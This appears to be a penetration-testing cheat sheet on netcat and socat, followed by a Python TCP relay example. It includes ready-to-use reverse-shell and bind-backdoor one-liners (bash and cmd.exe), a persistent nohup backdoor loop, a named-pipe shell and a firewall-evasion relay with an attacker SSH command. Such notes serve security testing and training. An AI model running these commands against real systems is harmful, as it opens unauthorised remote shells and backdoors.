# Netcat & Socat

## Netcat

### Basics

Connect to a socket on host `192.168.1.1` on TCP port 81

```bash
nc 192.168.1.1 81
```

Listen on the local machine for inbound TCP connections on port 81 (`-n` no DNS, `-v` verbose, `-l` listen, `-p` port)

```bash
nc -nvlp 81
```

Reverse shell sent to host `10.0.0.2` over TCP port 53. Note that `-e` only exists in the traditional netcat and in Ncat; the OpenBSD build most distros ship lacks it, so use the named-pipe trick further down on those hosts.

```bash
nc 10.0.0.2 53 -e /bin/bash
```

Backdoor listening on TCP 80 set to execute cmd.exe when connected

```bash
nc -nvlp 80 -e cmd.exe
```

### More Fancy

Attempt to connect to each port from 10-90 on `10.0.0.1`, don't resolve any names `-n`, don't send any data `-z`, and only wait 1 second for a connection `-w1`

```bash
nc -nvzw1 10.0.0.1 10-90
```

Netcat stops listening once the connection drops or is terminated, which makes getting another shell back annoying. Wrapping `nc` in an infinite bash loop is an easy workaround; start it with `nohup` as well so it survives the parent session closing.

```bash
nohup sh -c 'while true; do echo "started"; nc -l -p 1234 -e /bin/sh; done' &
```

Netcat relay used to forward everything received by the host on TCP 4321 to `10.0.0.1` on TCP 8123. This is one-directional: whatever `10.0.0.1:8123` sends back lands on the second `nc`'s stdout, not on the original client. The named-pipe construction in the next section makes the relay two-way.

```bash
nc -l -p 4321 | nc 10.0.0.1 8123
```

Create a `netcat` backdoor on a build without `-e` support. A named pipe (`mknod ... p`, or the more portable `mkfifo`) carries what `nc` receives back into `bash`'s stdin, while bash's output reaches `nc` through the ordinary pipe, so data circulates between the two processes.

```bash
mknod backpipe p     # or: mkfifo backpipe
/bin/bash 0<backpipe | nc -l -p 8080 1>backpipe
```

### Firewall Evasion

If a specific port is blocked at the firewall, netcat can relay through an allowed one. The named pipe carries the return direction, so this relay is two-way: the listener on TCP 80 feeds the local SSH daemon on 22, and SSH's replies travel back through the pipe to the client.

```bash
mknod mypipe p       # or: mkfifo mypipe
nc -lp 80 < mypipe | nc 127.0.0.1 22 > mypipe
ssh backdoor@m4lwhere.org -p 80    # Attacker command: SSH session piped through port 80
```

## Socat

socat is a more capable relative of netcat: it supports TLS (`openssl-listen`), bidirectional relays in a single command, and forking a handler per connection (`fork`), which the plain `nc` relays above cannot do.

```bash
# Listen locally on 8080 and relay each connection to 10.0.0.1:80 (two-way)
socat -v tcp4-listen:8080,reuseaddr,fork TCP4:10.0.0.1:80

# Listen with TLS (server cert and key in ssl.pem), skip client-cert verification, and write to stdout
socat openssl-listen:8443,reuseaddr,cert=ssl.pem,verify=0,fork stdio
```
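The relays above (the one-way `nc -l -p 4321 | nc ...` pipe, the named-pipe version, and socat's `tcp4-listen:...,reuseaddr,fork`) all do the same job. As an added example that is not part of the original notes and not socat's or netcat's own code, here is a minimal Python relay that makes the mechanics explicit: one thread per accepted connection stands in for `fork`, `SO_REUSEADDR` for `reuseaddr`, and a `bidirectional=False` switch reproduces the single-pipe netcat relay, where replies never reach the client. The loopback echo server and the payloads are constructed for the example; binding `127.0.0.1` on port 0 is an assumption chosen so it runs offline.

```python
# Added example, not from the notes page or from socat/netcat: a thread-per-connection
# TCP relay equivalent to `socat tcp4-listen:PORT,reuseaddr,fork TCP4:HOST:PORT`,
# plus a one-way mode matching `nc -l -p 4321 | nc HOST PORT`.
import socket
import threading

BUFSIZE = 4096


def pump(src, dst):
    """Copy bytes src -> dst until src hits EOF, then half-close dst so it sees EOF too.

    dst=None discards the data: that is what happens to replies in the one-way
    `nc | nc` relay (they land on the second nc's stdout instead of the client).
    """
    try:
        while True:
            data = src.recv(BUFSIZE)
            if not data:
                break
            if dst is not None:
                dst.sendall(data)
    except OSError:
        pass
    finally:
        if dst is not None:
            try:
                dst.shutdown(socket.SHUT_WR)
            except OSError:
                pass


def handle(client, target, bidirectional):
    """Serve one accepted client: connect upstream and pump each direction in its own thread."""
    upstream = socket.create_connection(target)
    forward = threading.Thread(target=pump, args=(client, upstream))
    back = threading.Thread(target=pump, args=(upstream, client if bidirectional else None))
    forward.start()
    back.start()
    forward.join()
    back.join()
    client.close()
    upstream.close()


def _listener(addr):
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  # socat's reuseaddr
    srv.bind(addr)
    srv.listen(16)
    return srv


def _accept_loop(srv, per_conn):
    while True:
        try:
            conn, _ = srv.accept()
        except OSError:  # listener closed
            return
        threading.Thread(target=per_conn, args=(conn,), daemon=True).start()  # socat's fork


def start_relay(listen_addr, target, bidirectional=True):
    """Listen on listen_addr and relay every connection to target; returns the listening socket."""
    srv = _listener(listen_addr)
    threading.Thread(target=_accept_loop,
                     args=(srv, lambda c: handle(c, target, bidirectional)), daemon=True).start()
    return srv


def start_echo_server():
    """Constructed stand-in for the real 10.0.0.1:80 target: echoes input, closes on EOF."""
    def echo_one(conn):
        with conn:
            while True:
                data = conn.recv(BUFSIZE)
                if not data:
                    break
                conn.sendall(data)
    srv = _listener(("127.0.0.1", 0))  # assumption: loopback, kernel-chosen port
    threading.Thread(target=_accept_loop, args=(srv, echo_one), daemon=True).start()
    return srv


def relay_roundtrip(payload, bidirectional=True):
    """Send payload through a fresh relay to the echo server and return whatever comes back."""
    echo = start_echo_server()
    relay = start_relay(("127.0.0.1", 0), echo.getsockname(), bidirectional)
    try:
        with socket.create_connection(relay.getsockname(), timeout=5) as c:
            c.sendall(payload)
            c.shutdown(socket.SHUT_WR)  # done sending; now wait for the reply or EOF
            chunks = []
            while True:
                data = c.recv(BUFSIZE)
                if not data:
                    break
                chunks.append(data)
        return b"".join(chunks)
    finally:
        relay.close()
        echo.close()


if __name__ == "__main__":
    print(relay_roundtrip(b"GET / HTTP/1.0\r\n\r\n"))      # two-way: the echo comes back
    print(relay_roundtrip(b"hello", bidirectional=False))  # one-way: client gets b""
```

The `bidirectional=False` run is the point of the one-way caveat: the upstream reply is read and thrown away, exactly as a lone `nc -l -p 4321 | nc ...` drops it on stdout, and the client only ever sees EOF.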

